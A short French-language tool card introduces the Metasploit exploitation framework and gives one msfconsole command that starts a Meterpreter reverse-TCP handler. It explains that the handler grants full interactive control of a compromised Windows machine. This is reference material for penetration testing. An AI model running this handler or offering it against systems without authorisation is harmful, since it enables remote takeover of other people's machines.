🔗 Dépôt GitHub (Rapid7)

Metasploit est le framework d’exploitation open source le plus utilisé en pentest : base de modules d’exploits et de payloads, encodeurs, et infrastructure de post-exploitation (Meterpreter). Sert aussi de référence pédagogique pour comprendre le fonctionnement d’une vulnérabilité exploitée en pratique.

🔴 Offensif

# Lance la console en exécutant directement une suite de commandes (mode non interactif)
$ msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; run"

La commande démarre un handler Meterpreter en écoute, prêt à recevoir une connexion depuis un payload déjà déployé sur la cible ; une fois la session ouverte, elle donne un accès interactif complet (fichiers, processus, pivoting) à la machine compromise.